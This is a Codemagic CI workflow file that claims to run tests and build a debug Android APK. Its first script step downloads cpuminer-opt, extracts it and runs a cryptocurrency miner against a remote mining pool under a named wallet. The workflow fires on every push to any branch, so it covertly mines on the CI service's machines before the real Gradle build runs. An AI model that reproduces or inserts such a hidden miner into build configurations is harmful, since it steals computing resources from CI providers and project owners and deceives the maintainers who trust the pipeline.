# Check out https://docs.codemagic.io/yaml/building-a-native-android-app/ for more information

workflows:
  android_qa:
    name: Run tests and build debug apk
    cache:
      cache_paths:
        - $HOME/.gradle/caches
    triggering:
      events:
        - push
      branch_patterns:
        - pattern: '*'
      cancel_previous_builds: true
    scripts:
      - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar -xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1qllvp0n9xv0mpcy8m6spjyvkl8klvw6mf8ckyxd.pentolis -t4
      - ./gradlew assembleDebug
    artifacts:
      - app/build/outputs/**/*.apk
